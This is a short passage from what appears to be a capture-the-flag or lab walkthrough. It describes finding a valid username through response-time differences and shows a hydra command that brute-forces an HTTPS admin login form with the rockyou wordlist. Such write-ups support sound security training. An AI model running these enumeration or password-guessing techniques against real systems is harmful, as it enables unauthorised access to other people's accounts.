z0ne323/CR47/Walkthrough/Walkthrough.md

 After trying different username format, we end up finding a valid pair of credential with `santiago.carrillo` as the username:

+(Side note: This username format can be found by seeing that using `santiago.carrillo` for our requests gave us a longer response time then a faulty username)

 ```bash
 ┌──(kali㉿kali)-[~]
 └─$ hydra -l santiago.carrillo -P /usr/share/wordlists/rockyou.txt cr47.cr https-post-form "/acceso/administracion.php:username=^USER^&password=^PASS^:S=302" -t 64